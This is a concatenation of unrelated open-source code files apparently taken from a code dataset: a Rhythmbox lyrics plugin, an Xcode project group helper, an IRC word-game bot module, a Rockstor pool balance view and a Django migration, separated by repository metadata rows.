import LyricsParse
from LyricsConfigureDialog import LyricsConfigureDialog
import gettext
gettext.install('rhythmbox', RB.locale_dir())
LYRIC_TITLE_STRIP=["\(live[^\)]*\)", "\(acoustic[^\)]*\)", "\([^\)]*mix\)", "\([^\)]*version\)", "\([^\)]*edit\)", "\(feat[^\)]*\)"]
LYRIC_TITLE_REPLACE=[("/", "-"), (" & ", " and ")]
LYRIC_ARTIST_REPLACE=[("/", "-"), (" & ", " and ")]
STREAM_SONG_TITLE='rb:stream-song-title'
def create_lyrics_view():
tview = Gtk.TextView()
tview.set_wrap_mode(Gtk.WrapMode.WORD)
tview.set_editable(False)
tview.set_left_margin(6)
tview.set_size_request (0, 0)
sw = Gtk.ScrolledWindow()
sw.add(tview)
sw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
sw.set_shadow_type(Gtk.ShadowType.IN)
vbox = Gtk.VBox(spacing=12)
vbox.pack_start(sw, True, True, 0)
return (vbox, tview.get_buffer(), tview)
def parse_song_data(db, entry):
(artist, title) = get_artist_and_title(db, entry)
# don't search for 'unknown' when we don't have the artist or title information
if artist == _("Unknown"):
artist = ""
if title == _("Unknown"):
title = ""
# convert to lowercase
artist = artist.lower()
title = title.lower()
# replace ampersands and the like
for exp in LYRIC_ARTIST_REPLACE:
artist = re.sub(exp[0], exp[1], artist)
for exp in LYRIC_TITLE_REPLACE:
title = re.sub(exp[0], exp[1], title)
	# strip things like "(live at Somewhere)", "(acoustic)", etc
for exp in LYRIC_TITLE_STRIP:
title = re.sub (exp, '', title)
# compress spaces
title = title.strip()
artist = artist.strip()
return (artist, title)
def get_artist_and_title(db, entry):
stream_song_title = db.entry_request_extra_metadata(entry, STREAM_SONG_TITLE)
if stream_song_title is not None:
(artist, title) = extract_artist_and_title(stream_song_title)
else:
artist = entry.get_string(RB.RhythmDBPropType.ARTIST)
title = entry.get_string(RB.RhythmDBPropType.TITLE)
return (artist, title)
def extract_artist_and_title(stream_song_title):
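	# stream titles typically look like "Artist - Title" or "Title (Artist)"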
details = stream_song_title.split('-')
if len(details) > 1:
artist = details[0].strip()
title = details[1].strip()
else:
details = stream_song_title.split('(')
if len(details) > 1:
title = details[0].strip()
artist = details[1].strip(') ')
else:
title = stream_song_title
artist = ""
return (artist, title)
def build_cache_path(artist, title):
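	# cache layout: <lyrics folder>/<artist>/<title>.lyric, path components truncated to 128 chars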
settings = Gio.Settings.new("org.gnome.rhythmbox.plugins.lyrics")
folder = settings['folder']
if folder is None or folder == "":
folder = os.path.join(RB.user_cache_dir(), "lyrics")
lyrics_folder = os.path.expanduser (folder)
if not os.path.exists (lyrics_folder):
os.mkdir (lyrics_folder)
artist_folder = os.path.join(lyrics_folder, artist[:128])
if not os.path.exists (artist_folder):
os.mkdir (artist_folder)
return os.path.join(artist_folder, title[:128] + '.lyric')
class LyricGrabber(object):
"""
Fetch lyrics from several sources.
1. Local cache file
2. Lyric tags in file meta data
3. Online services
"""
def __init__(self, db, entry):
self.db = db
self.entry = entry
(self.artist, self.title) = parse_song_data(self.db, self.entry)
self.cache_path = build_cache_path(self.artist, self.title)
def verify_lyric(self):
return os.path.exists(self.cache_path)
def search_lyrics(self, callback, cache_only=False):
"""
Fetch lyrics from cache.
If no cache file exist, tag extraction is tried next.
"""
self.callback = callback
status = self.verify_lyric()
if status:
f = open(self.cache_path, 'rt')
text = f.read()
f.close()
self.callback(text)
elif cache_only:
self.callback(_("No lyrics found"))
else:
self.search_tags()
def search_tags(self):
"""
Initiate fetching meta tags.
Result will be handled in search_tags_result
"""
location = self.entry.get_playback_uri()
self.discoverer = GstPbutils.Discoverer(timeout=Gst.SECOND*3)
self.discoverer.connect('discovered', self.search_tags_result)
self.discoverer.start()
self.discoverer.discover_uri_async(location)
def search_tags_result(self, discoverer, info, error):
"""
Extract lyrics from the file meta data (tags).
If no lyrics tags are found, online services are tried next.
Supported file formats and lyrics tags:
- ogg/vorbis files with "LYRICS" and "SYNCLYRICS" tag
"""
tags = info.get_tags()
if tags is None:
self.search_online()
return
for i in range(tags.get_tag_size("extended-comment")):
(exists, value) = tags.get_string_index("extended-comment", i)
#ogg/vorbis unsynchronized lyrics
if exists and value.startswith("LYRICS"):
text = value.replace("LYRICS=", "")
self.lyrics_found(text)
return
#ogg/vorbis synchronized lyrics
elif exists and value.startswith("SYNCLYRICS"):
text = value.replace("SYNCLYRICS=", "")
self.lyrics_found(text)
return
self.search_online()
def search_online(self):
"""Initiate searching the online lyrics services"""
if self.artist == "" and self.title == "":
self.callback(_("No lyrics found"))
else:
parser = LyricsParse.Parser(self.artist, self.title)
parser.get_lyrics(self.search_online_result)
def search_online_result(self, text):
"""Handle the result of searching online lyrics services"""
if text is not None:
self.lyrics_found(text)
else:
self.callback(_("No lyrics found"))
def lyrics_found(self, text):
f = open(self.cache_path, 'wt')
f.write(text)
f.close()
self.callback(text)
class LyricPane(object):
def __init__(self, db, song_info):
self.db = db
self.song_info = song_info
self.entry = self.song_info.props.current_entry
self.build_path()
def save_lyrics(cache_path, text):
f = open(cache_path, 'wt')
f.write(text)
f.close()
def erase_lyrics(cache_path):
f = open(cache_path, 'w')
f.write("")
f.close()
def save_callback():
buf = self.buffer
startiter = buf.get_start_iter()
enditer = buf.get_end_iter()
text = buf.get_text(startiter, enditer, True)
save_lyrics(self.cache_path, text)
self.get_lyrics()
def edit_callback(widget):
if self.edit.get_active() == 1:
self.tview.set_editable(True)
self.edit.set_label(_("_Save"))
else:
if self.cache_path is not None:
save_callback()
self.tview.set_editable(False)
self.edit.set_label(_("_Edit"))
def discard_callback(widget):
if self.cache_path is not None and os.path.exists(self.cache_path):
os.remove(self.cache_path)
self.get_lyrics()
def clear_callback(widget):
if self.cache_path is not None and os.path.exists (self.cache_path):
erase_lyrics(self.cache_path)
self.get_lyrics()
self.edit = Gtk.ToggleButton(label=_("_Edit"), use_underline=True)
self.edit.connect('toggled', edit_callback)
self.discard = Gtk.Button(label=_("_Search again"), use_underline=True)
self.discard.connect('clicked', discard_callback)
self.clear = Gtk.Button.new_from_stock(Gtk.STOCK_CLEAR)
self.clear.connect('clicked', clear_callback)
self.hbox = Gtk.ButtonBox(orientation=Gtk.Orientation.HORIZONTAL)
self.hbox.set_spacing (6)
self.hbox.set_layout(Gtk.ButtonBoxStyle.END)
self.hbox.add(self.edit)
self.hbox.add(self.clear)
self.hbox.add(self.discard)
self.hbox.set_child_secondary (self.clear, True)
(self.view, self.buffer, self.tview) = create_lyrics_view()
self.view.pack_start(self.hbox, False, False, 0)
self.view.set_spacing(6)
self.view.props.margin = 6
self.view.show_all()
self.page_num = song_info.append_page(_("Lyrics"), self.view)
self.have_lyrics = 0
self.visible = 0
self.entry_change_id = song_info.connect('notify::current-entry', self.entry_changed)
nb = self.view.get_parent()
self.switch_page_id = nb.connect('switch-page', self.switch_page_cb)
#self.get_lyrics()
def build_path(self):
(artist, title) = parse_song_data(self.db, self.entry)
cache_path = build_cache_path(artist, title)
self.cache_path = cache_path
def entry_changed(self, pspec, duh):
self.entry = self.song_info.props.current_entry
self.have_lyrics = 0
if self.visible != 0:
self.build_path()
self.get_lyrics()
def switch_page_cb(self, notebook, page, page_num):
if self.have_lyrics != 0:
return
if page_num != self.page_num:
self.visible = 0
return
self.visible = 1
self.get_lyrics()
def __got_lyrics(self, text):
self.buffer.set_text(text, -1)
def get_lyrics(self):
if self.entry is None:
return
self.buffer.set_text(_("Searching for lyrics..."), -1);
lyrics_grabber = LyricGrabber(self.db, self.entry)
lyrics_grabber.search_lyrics(self.__got_lyrics)
class LyricWindow (Gtk.Window):
def __init__(self, shell):
Gtk.Window.__init__(self)
self.shell = shell
self.set_border_width(12)
close = Gtk.Button.new_from_stock(Gtk.STOCK_CLOSE)
close.connect('clicked', lambda w: self.destroy())
(lyrics_view, buffer, tview) = create_lyrics_view()
self.buffer = buffer
bbox = Gtk.HButtonBox()
bbox.set_layout(Gtk.ButtonBoxStyle.END)
bbox.pack_start(close, True, True, 0)
lyrics_view.pack_start(bbox, False, False, 0)
sp = shell.props.shell_player
self.ppc_id = sp.connect('playing-song-property-changed', self.playing_property_changed)
self.add(lyrics_view)
self.set_default_size(400, 300)
self.show_all()
def destroy(self):
sp = self.shell.props.shell_player
sp.disconnect (self.ppc_id)
Gtk.Window.destroy(self)
def playing_property_changed(self, player, uri, prop, old_val, new_val):
if (prop == STREAM_SONG_TITLE):
self.update_song_lyrics(player.get_playing_entry())
def __got_lyrics(self, text):
self.buffer.set_text (text, -1)
def update_song_lyrics(self, entry):
db = self.shell.props.db
(artist, title) = get_artist_and_title(db, entry)
self.set_title(title + " - " + artist + " - " + _("Lyrics"))
lyrics_grabber = LyricGrabber(db, entry)
lyrics_grabber.search_lyrics(self.__got_lyrics)
class LyricsDisplayPlugin(GObject.Object, Peas.Activatable):
__gtype_name__ = 'LyricsDisplayPlugin'
object = GObject.property(type=GObject.Object)
def __init__ (self):
GObject.Object.__init__ (self)
self.window = None
def do_activate (self):
shell = self.object
self.action = Gio.SimpleAction.new("view-lyrics", None)
self.action.connect("activate", self.show_song_lyrics, shell)
# set accelerator?
window = shell.props.window
window.add_action(self.action)
app = shell.props.application
item = Gio.MenuItem.new(label=_("Song Lyrics"), detailed_action="win.view-lyrics")
app.add_plugin_menu_item("view", "view-lyrics", item)
sp = shell.props.shell_player
self.pec_id = sp.connect('playing-song-changed', self.playing_entry_changed)
self.playing_entry_changed (sp, sp.get_playing_entry ())
self.csi_id = shell.connect('create_song_info', self.create_song_info)
db = shell.props.db
self.lyric_req_id = db.connect_after ('entry-extra-metadata-request::rb:lyrics', self.lyrics_request)
def do_deactivate (self):
shell = self.object
app = shell.props.application
app.remove_plugin_menu_item("view", "view-lyrics")
app.remove_action("view-lyrics")
self.action = None
sp = shell.props.shell_player
sp.disconnect (self.pec_id)
shell.disconnect (self.csi_id)
shell.props.db.disconnect (self.lyric_req_id)
if self.window is not None:
self.window.destroy ()
self.window = None
def show_song_lyrics (self, action, parameter, shell):
if self.window is not None:
self.window.destroy ()
self.window = None
sp = shell.props.shell_player
entry = sp.get_playing_entry ()
if entry is not None:
self.window = LyricWindow(shell)
self.window.connect("destroy", self.window_deleted)
self.window.update_song_lyrics(entry)
def playing_entry_changed (self, sp, entry):
if entry is not None:
self.action.set_enabled (True)
if self.window is not None:
self.window.update_song_lyrics(entry)
else:
self.action.set_enabled (False)
def window_deleted (self, window):
print("lyrics window destroyed")
self.window = None
def create_song_info (self, shell, song_info, is_multiple):
if is_multiple is False:
x = LyricPane(shell.props.db, song_info)
def lyrics_request (self, db, entry):
def lyrics_results(text):
if text:
db.emit_entry_extra_metadata_notify (entry, 'rb:lyrics', text)
lyrics_grabber = LyricGrabber(db, entry)
lyrics_grabber.search_lyrics(lyrics_results)
|
gpl-2.0
| -9,014,837,923,013,151,000 | 27.853002 | 132 | 0.693456 | false |
dayongxie/mod-pbxproj
|
pbxproj/pbxextensions/ProjectGroups.py
|
2
|
6229
|
from pbxproj.pbxsections import *
class ProjectGroups:
"""
This class provides separation of concerns, this class contains all methods related to groups manipulations.
This class should not be instantiated on its own
"""
def __init__(self):
raise EnvironmentError('This class cannot be instantiated directly, use XcodeProject instead')
def add_group(self, name, path=None, parent=None, source_tree=u'<group>'):
"""
Add a new group with the given name and optionally path to the parent group. If parent is None, the group will
be added to the 'root' group.
Additionally the source tree type can be specified, normally it's group.
:param name: Name of the group to be added (visible folder name)
:param path: Path relative to the project where this group points to. If not present, name will match the path
name
:param parent: The PBXGroup that will be the parent of this group. If parent is None, the default 'root' group
will be used as parent
:param source_tree: The type of group to be created
:return: PBXGroup created
"""
group = PBXGroup.create(name=name, path=path, tree=source_tree)
parent = self._get_parent_group(parent)
parent.add_child(group)
self.objects[group.get_id()] = group
return group
def remove_group_by_id(self, group_id, recursive=True):
"""
Remove the group matching the given group_id. If recursive is True, all descendants of this group are also removed.
:param group_id: The group id to be removed
:param recursive: All descendants should be removed as well
        :return: True if the element was removed successfully, False if an error occurred or there was nothing to remove.
"""
group = self.objects[group_id]
if group is None:
return False
result = True
# iterate over the children and determine if they are file/group and call the right method.
for subgroup_id in list(group.children):
subgroup = self.objects[subgroup_id]
if subgroup is None:
return False
if recursive and isinstance(subgroup, PBXGroup):
result &= self.remove_group_by_id(subgroup.get_id(), recursive)
if isinstance(subgroup, PBXFileReference):
result &= self.remove_file_by_id(subgroup.get_id())
if not result:
return False
del self.objects[group.get_id()]
# remove the reference from any other group object that could be containing it.
for other_group in self.objects.get_objects_in_section(u'PBXGroup'):
other_group.remove_child(group)
return True
def remove_group_by_name(self, group_name, recursive=True):
"""
Remove the groups matching the given name. If recursive is True, all descendants of this group are also removed.
        This method could cause the removal of multiple groups that are not necessarily intended to be removed; use
        with caution.
:param group_name: The group name to be removed
:param recursive: All descendants should be removed as well
:return: True if the element was removed successfully, False otherwise
"""
groups = self.get_groups_by_name(name=group_name)
if groups.__len__() == 0:
return False
for group in groups:
if not self.remove_group_by_id(group.get_id(), recursive):
return False
return True
def get_groups_by_name(self, name, parent=None):
"""
Retrieve all groups matching the given name and optionally filtered by the given parent node.
        :param name: The name of the group that has to be returned
        :param parent: A PBXGroup object that the group has to be retrieved from. If None, all matching groups are returned
        :return: A list of all matching groups
"""
groups = self.objects.get_objects_in_section(u'PBXGroup')
groups = [group for group in groups if group.get_name() == name]
if parent:
return [group for group in groups if parent.has_child(group)]
return groups
def get_groups_by_path(self, path, parent=None):
"""
Retrieve all groups matching the given path and optionally filtered by the given parent node.
The path is converted into the absolute path of the OS before comparison.
        :param path: The path of the group that has to be returned
        :param parent: A PBXGroup object that the group has to be retrieved from. If None, all matching groups are returned
        :return: A list of all matching groups
"""
groups = self.objects.get_objects_in_section(u'PBXGroup')
groups = [group for group in groups if group.get_path() == path]
if parent:
return [group for group in groups if parent.has_child(group)]
return groups
def get_or_create_group(self, name, path=None, parent=None):
if not name:
return None
groups = self.get_groups_by_name(name, parent)
if groups.__len__() > 0:
return groups[0]
return self.add_group(name, path, parent)
def _get_parent_group(self, parent):
if parent is None:
# search for the mainGroup of the project
project = self.objects[self[u'rootObject']]
if project:
parent = self.objects[project[u'mainGroup']]
if parent is not None:
return parent
# search for the group without name
parent = self.get_groups_by_name(None)
            # if there is no parent, create an empty parent group and add it to the objects
if parent.__len__() > 0:
return parent[0]
parent = PBXGroup.create(path=None, name=None)
self.objects[parent.get_id()] = parent
return parent
# it's not a group instance, assume it's an id
if not isinstance(parent, PBXGroup):
return self.objects[parent]
return parent
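# Hedged usage sketch (added; not part of the original module). ProjectGroups is
# mixed into XcodeProject, so the calls below assume the XcodeProject class from
# the parent pbxproj package; the file path and group names are hypothetical.
#
#     from pbxproj import XcodeProject
#
#     project = XcodeProject.load('App.xcodeproj/project.pbxproj')
#     vendor = project.get_or_create_group('Vendor')
#     third_party = project.add_group('ThirdParty', path='vendor/third_party',
#                                     parent=vendor)
#     # ... add files to third_party here ...
#     project.remove_group_by_id(third_party.get_id(), recursive=True)
#     project.save()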
|
bsd-3-clause
| -8,915,274,105,796,946,000 | 39.448052 | 124 | 0.630599 | false |
relet/phenny-games
|
modules/taboo.py
|
1
|
8756
|
#!/usr/bin/env python
"""a taboo extension for phenny
(c)opyleft 2008-2009 Thomas Hirsch
Licence: GPL"""
import bz2, random, time, yaml, re
from operator import itemgetter
from math import floor
dico = {}
DEFINE_NONE = None
DEFINE_DEFINE = 1 #status codes for the define game
DEFINE_SELECT = 2
commonwords = []
#commonwords = ['SUCH', 'THAT', 'THAN', 'WHICH', 'FROM', 'WITH', 'OTHER', 'SOME', 'THEIR', 'WHOSE', 'PASS', 'WHERE', 'BEING', 'USED', 'BEEN']
words = bz2.BZ2File("wordlist/wiktionary.txt.bz2","r")
index = None
for line in words:
line = line.strip()
if line[0]=='?':
index = line[1:].upper()
if len(re.findall('[^A-Z ]',index))>0:
index=None
elif line[0]=="!":
if index:
dico[index]=line[1:]
def uniq(seq):
"eliminates duplicates from a list"
if len(seq)<2:
return seq
rest = uniq(seq[1:])
if seq[0] in rest:
return rest
else:
return [seq[0]]+rest
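# Worked example (added): because uniq() recurses on the tail and drops seq[0]
# whenever it reappears later, it keeps the *last* occurrence of each duplicate:
# uniq([3, 1, 2, 1]) == [3, 2, 1]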
def setup(self):
try:
yamldata = open("taboo.yaml",'r')
self.taboo = yaml.load(yamldata.read())
except:
self.taboo={}
self.taboo['run']=False
self.taboo['scores']={}
try:
yamldata = open("defind.yaml",'r')
self.define = yaml.load(yamldata.read())
except:
self.define={}
self.define['run']=False
self.define['status']=None
self.define['scores']={}
self.define['word']=None
self.define['defs']=[]
self.define['selected']={}
def initgame(phenny, input):
phenny.taboo['clue']=False
phenny.taboo['taboo']=False
phenny.taboo['run']=True
phenny.taboo['lines']=0
phenny.taboo['time']=time.time()
phenny.taboo['round']={}
playtime = 301
def definescores(phenny, input):
total = phenny.define['scores']
msg = 'Total defind scores: '
ordered = sorted(total.items(), key=itemgetter(1), reverse = True)
for entry in ordered[:10]:
msg += entry[0]+": "+str(entry[1])+"; "
phenny.say(msg)
definescores.commands = ["dtop", "dscores", "dhof"]
definescores.thread = True
definescores.priority = 'low'
def defind(phenny, input):
if phenny.define['run']:
return
phenny.define['run'] = True
phenny.define['status'] = DEFINE_NONE
phenny.define['defs'] = []
phenny.define['selected']={}
while True:
word = random.choice(dico.keys())
if len(word.split(" "))<3 and dico[word].strip():
break
phenny.define['word']=word
phenny.say("Do you all know what %s means? Quick, send me your .def[inition] via private message!" % word)
phenny.define['defs'] = [[dico[word], "Wiktionary"]]
phenny.define['status'] = DEFINE_DEFINE
time.sleep(120)
defs = phenny.define['defs'][:]
n=1
ordered = []
phenny.say("Let's see, what could %s mean?." % word)
while len(defs)>0:
df = random.choice(defs)
defs.remove(df)
ordered.append([df[0], df[1], n])
phenny.say("%i: %s" % (n,df[0]))
n+=1
phenny.define['defs']=ordered
phenny.define['status'] = DEFINE_SELECT
phenny.say("Now, .select the definition which you would expect to be the official one.")
time.sleep(60)
phenny.define['status'] = DEFINE_NONE
phenny.say("Very well, let's see who has tricked whom today.")
followers = {}
selection = phenny.define['selected']
for fool in selection.keys():
id = selection[fool]
if id in followers:
followers[id].append(fool)
else:
followers[id]=[fool]
for df in ordered:
msg = "%s proposed: '%s'" % (df[1], df[0])
fools = followers.get(df[2],[])
if len(fools):
if len(fools)==1:
msg += " - %s was convinced." % fools[0]
else:
msg += " - %i were convinced." % len(fools)
if df[1]!="Wiktionary":
phenny.define['scores'][df[1]]=phenny.define['scores'].get(df[1],0) + len(fools)*3
else:
for fool in fools:
phenny.define['scores'][fool]=phenny.define['scores'].get(fool,0) + 1
phenny.say(msg)
phenny.define['run'] = False
yamldump = open("defind.yaml",'w') #save teh permanent scores
yamldump.write(yaml.dump(phenny.define))
yamldump.close()
definescores(phenny, input)
defind.commands = ["defind"]
defind.thread = True
defind.priority = 'low'
def definedef(phenny, input):
if not phenny.define['status']==DEFINE_DEFINE:
return
defs = phenny.define['defs']
for df in defs:
if input.nick==df[1]:
#phenny.say("You have already submitted a definition, %s" % input.nick)
#return
defs.remove(df)
break
df = input[input.find(" ")+1:]
defs.append([df, input.nick])
phenny.say("Thank you, %s" % input.nick)
definedef.commands = ["def","define","definition"]
definedef.thread = False
definedef.priority = 'low'
def selectdef(phenny, input):
if not phenny.define['status']==DEFINE_SELECT:
return
#if input.nick in phenny.define['selected']:
# phenny.say("No changing minds, %s." % input.nick)
# return
try:
par = input[input.find(" ")+1:]
pos = int(par)
df = phenny.define['defs'][pos-1] #throws an exception if out of bounds
if df[1]==input.nick:
#intentionally no message provided
return
phenny.define['selected'][input.nick]=pos
phenny.say("A wise choice, %s" % input.nick)
except:
phenny.say("That's nothing you could choose from, %s." % input.nick)
return
selectdef.commands = ["select"]
selectdef.thread = True
selectdef.priority = 'low'
def tabooify(string):
return re.sub('[^A-Z ]',' ',string.strip().upper())
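# Example (added): tabooify() upper-cases a clue and replaces anything other
# than A-Z and spaces, so tabooify('Hello, world!') == 'HELLO  WORLD '
# (punctuation becomes spaces rather than being stripped).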
def taboo(phenny, input):
if phenny.taboo['run']:
return
initgame(phenny, input)
while True:
if not phenny.taboo['clue']:
while True:
clue = random.choice(dico.keys())
boos = uniq(sorted([x for x in tabooify(dico[clue]).split() if len(x)>3]))
for com in commonwords:
if com in boos:
boos.remove(com)
phenny.taboo['clue']=clue
phenny.taboo['boos']=boos
if len(boos)>2:
break
phenny.taboo['player']=input.nick
phenny.bot.msg(input.nick,"describe "+clue+" without using any of "+reduce(lambda x,y:x+", "+y, boos)) #private message to originator
tdiff = playtime - (time.time()-phenny.taboo['time'])
tmin = int(floor(tdiff/60))
tstr = str(tmin) + " minutes " + str(int(floor(tdiff-tmin*60))) + " seconds"
phenny.say("Taboo: Off we go! "+tstr+" and counting..")
else:
time.sleep(1)
if time.time() > phenny.taboo['time'] + playtime:
phenny.say("Time out.")
break
if phenny.taboo['taboo']==True: #A taboo word was said
break
score = phenny.taboo['round']
if len(score)>0:
msg = 'Taboo results: '
for player in score:
scr = score[player]
phenny.taboo['scores'][player]=phenny.taboo['scores'].get(player,0)+scr
msg += player+": "+str(scr)+"; "
phenny.taboo['run'] = False
yamldump = open("taboo.yaml",'w') #save teh permanent scores
yamldump.write(yaml.dump(phenny.taboo))
yamldump.close()
phenny.say(msg)
phenny.taboo['run'] = False
taboo.commands=["taboo"]
taboo.thread=True
taboo.priority='low'
def tabooanswer(phenny, input):
if phenny.taboo['run']==False:
return
if phenny.taboo['clue']==False:
return
answer = re.sub('[^A-Z]','',input.strip().upper())
nospaceclue = re.sub(' ','',phenny.taboo['clue'])
if input.nick == phenny.taboo['player']:
phenny.taboo['lines']=phenny.taboo.get('lines',0)+1 #count the clues needed
for boo in phenny.taboo['boos']:
if boo in answer:
phenny.say("TABOO!")
phenny.taboo['taboo']=True
return #to avoid double mentions
if nospaceclue in answer:
phenny.say("DOUBLE BOO!")
phenny.taboo['taboo']=True
phenny.taboo['round'][input.nick]=0
else:
if answer == nospaceclue:
pscore = phenny.taboo['round'].get(phenny.taboo['player'],0)+1
ascore = phenny.taboo['round'].get(input.nick,0)+1
phenny.say(input.nick+": "+phenny.taboo['clue']+" is correct! You score "+str(ascore)+", "+phenny.taboo['player']+" scores "+str(pscore)+".")
phenny.taboo['round'][phenny.taboo['player']]=pscore
phenny.taboo['round'][input.nick]=ascore
phenny.taboo['clue']=False #ok for next word
tabooanswer.rule=".*?"
tabooanswer.thread=True
tabooanswer.priority='high'
def taboopass(phenny, input):
if phenny.taboo['run']:
if input.nick == phenny.taboo['player']:
phenny.taboo['clue']=False
phenny.say("Passed.")
taboopass.commands=["pass"]
taboopass.priority='low'
def thof(phenny,input):
total = phenny.taboo['scores']
msg = 'Total \'taboo\' scores: '
ordered = sorted(total.items(), key=itemgetter(1), reverse = True)
for entry in ordered[:10]:
msg += entry[0]+": "+str(entry[1])+"; "
phenny.say(msg)
thof.commands=["thof","ttop","taboohof","tabootop"]
thof.priority='low'
|
mit
| -4,444,352,367,475,145,000 | 30.049645 | 147 | 0.6254 | false |
priyaganti/rockstor-core
|
src/rockstor/storageadmin/views/pool_balance.py
|
1
|
4945
|
"""
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from rest_framework.response import Response
from django.db import transaction
from django_ztask.models import Task
from storageadmin.util import handle_exception
from storageadmin.serializers import PoolBalanceSerializer
from storageadmin.models import (Pool, PoolBalance)
import rest_framework_custom as rfc
from fs.btrfs import balance_status
from pool import PoolMixin
import logging
logger = logging.getLogger(__name__)
class PoolBalanceView(PoolMixin, rfc.GenericView):
serializer_class = PoolBalanceSerializer
@staticmethod
def _validate_pool(pname, request):
try:
return Pool.objects.get(name=pname)
except:
e_msg = ('Pool(%s) does not exist' % pname)
handle_exception(Exception(e_msg), request)
def get_queryset(self, *args, **kwargs):
with self._handle_exception(self.request):
pool = self._validate_pool(self.kwargs['pname'], self.request)
self._balance_status(pool)
return PoolBalance.objects.filter(pool=pool).order_by('-id')
@staticmethod
@transaction.atomic
def _balance_status(pool):
try:
# acquire a handle on the last pool balance status db entry
ps = PoolBalance.objects.filter(pool=pool).order_by('-id')[0]
except:
# return empty handed if we have no 'last entry' to update
return Response()
# Check if we have a running task which matches our last pool status
# tid
if (Task.objects.filter(uuid=ps.tid).exists()):
to = Task.objects.get(uuid=ps.tid)
if (to.failed is not None):
ps.status = 'failed'
ps.message = to.last_exception
ps.end_time = to.failed
ps.save()
to.delete()
return ps
        # Get the current status of balance on this pool, irrespective of
        # a running balance task, i.e. command line intervention.
cur_status = balance_status(pool)
previous_status = ps.status
# TODO: future "Balance Cancel" button should call us to have these
# TODO: values updated in the db table ready for display later.
if previous_status == 'cancelling' \
and cur_status['status'] == 'finished':
# override current status as 'cancelled'
cur_status['status'] = 'cancelled'
cur_status['message'] = \
'cancelled at %s%% complete' % ps.percent_done
# and retain prior percent finished value
cur_status['percent_done'] = ps.percent_done
if previous_status != 'finished' and previous_status != 'cancelled':
# update the last pool balance status with current status info.
PoolBalance.objects.filter(id=ps.id).update(**cur_status)
return ps
@transaction.atomic
def post(self, request, pname, command=None):
pool = self._validate_pool(pname, request)
if (command is not None and command != 'status'):
e_msg = ('Unknown balance command: %s' % command)
handle_exception(Exception(e_msg), request)
with self._handle_exception(request):
ps = self._balance_status(pool)
if (command == 'status'):
return Response(PoolBalanceSerializer(ps).data)
force = request.data.get('force', False)
if ((PoolBalance.objects.filter(pool=pool,
status__regex=r'(started|running)')
.exists())):
if (force):
p = PoolBalance.objects.filter(
pool=pool,
status__regex=r'(started|running)').order_by('-id')[0]
p.status = 'terminated'
p.save()
else:
e_msg = ('A Balance process is already running for '
'pool(%s).' % pname)
handle_exception(Exception(e_msg), request)
tid = self._balance_start(pool, force=force)
ps = PoolBalance(pool=pool, tid=tid)
ps.save()
return Response(PoolBalanceSerializer(ps).data)
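# Hedged usage sketch (added; not part of the original file). Assuming
# Rockstor's URL routing exposes this view at /api/pools/<pname>/balance and
# authentication is already handled, a client could drive it like this:
#
#     import requests
#
#     base = 'https://rockstor.local/api/pools/pool0/balance'   # hypothetical
#     requests.post(base + '/status', verify=False)             # latest status
#     requests.post(base, json={'force': True}, verify=False)   # start balance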
|
gpl-3.0
| 4,099,229,094,232,960,000 | 40.90678 | 79 | 0.611325 | false |
xzzy/statdev
|
approvals/migrations/0001_initial.py
|
1
|
3974
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-08-06 02:49
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0023_communicationslogentry_log_type'),
('applications', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Approval',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app_type', models.IntegerField(choices=[(1, 'Permit'), (2, 'Licence/permit'), (3, 'Part 5'), (4, 'Emergency works'), (5, 'Part 5 - Amendment Request'), (6, 'Part 5 - Amendment Application'), (7, 'Test - Application'), (8, 'Amend Permit'), (9, 'Amend Licence'), (10, 'Renew Permit'), (11, 'Renew Licence')])),
('title', models.CharField(max_length=254)),
('issue_date', models.DateField(auto_now_add=True, null=True)),
('start_date', models.DateField(blank=True, null=True)),
('expiry_date', models.DateField(blank=True, null=True)),
('status', models.IntegerField(choices=[(1, 'Current'), (2, 'Expired'), (3, 'Cancelled'), (4, 'Surrendered'), (5, 'Suspended'), (6, 'Reinstate')])),
('suspend_from_date', models.DateField(blank=True, null=True)),
('suspend_to_date', models.DateField(blank=True, null=True)),
('reinstate_date', models.DateField(blank=True, null=True)),
('cancellation_date', models.DateField(blank=True, null=True)),
('surrender_date', models.DateField(blank=True, null=True)),
('details', models.TextField(blank=True, null=True)),
('ammendment_application', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='ammendment_application', to='applications.Application')),
('applicant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='applicant_holder', to=settings.AUTH_USER_MODEL)),
('application', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='application', to='applications.Application')),
('approval_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approval_document', to='applications.Record')),
('organisation', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='accounts.Organisation')),
],
),
migrations.CreateModel(
name='CommunicationApproval',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comms_to', models.CharField(blank=True, max_length=256, null=True)),
('comms_from', models.CharField(blank=True, max_length=256, null=True)),
('subject', models.CharField(blank=True, max_length=256, null=True)),
('comms_type', models.IntegerField(choices=[(0, 'None'), (1, 'Phone'), (2, 'Email'), (3, 'Mail'), (4, 'System')], default=0)),
('details', models.TextField(blank=True, null=True)),
('state', models.IntegerField(blank=True, null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('approval', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='approvals.Approval')),
('records', models.ManyToManyField(blank=True, related_name='communication_approvals_docs', to='applications.Record')),
],
),
]
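# Note (added): as with any generated migration, this file is applied with
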